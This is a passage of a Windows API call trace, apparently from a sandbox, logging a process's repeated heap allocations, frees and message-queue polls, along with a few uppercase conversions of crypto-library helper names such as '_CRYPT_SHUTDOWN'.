hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.385] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0123.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0123.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.386] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0123.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.387] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0123.387] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0123.387] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925a8 [0123.387] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43925a8 | out: hHeap=0x1780000) returned 1 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0123.387] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0123.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0123.388] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0123.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.388] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0123.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0123.389] PeekMessageW (in: lpMsg=0x144e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e944) returned 0 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0123.389] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0123.389] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0123.389] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0123.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0123.390] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0123.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0123.391] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0123.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0123.391] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0123.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0123.391] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0123.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0123.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0123.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0123.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0123.391] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0123.393] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.393] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0123.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0123.393] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: 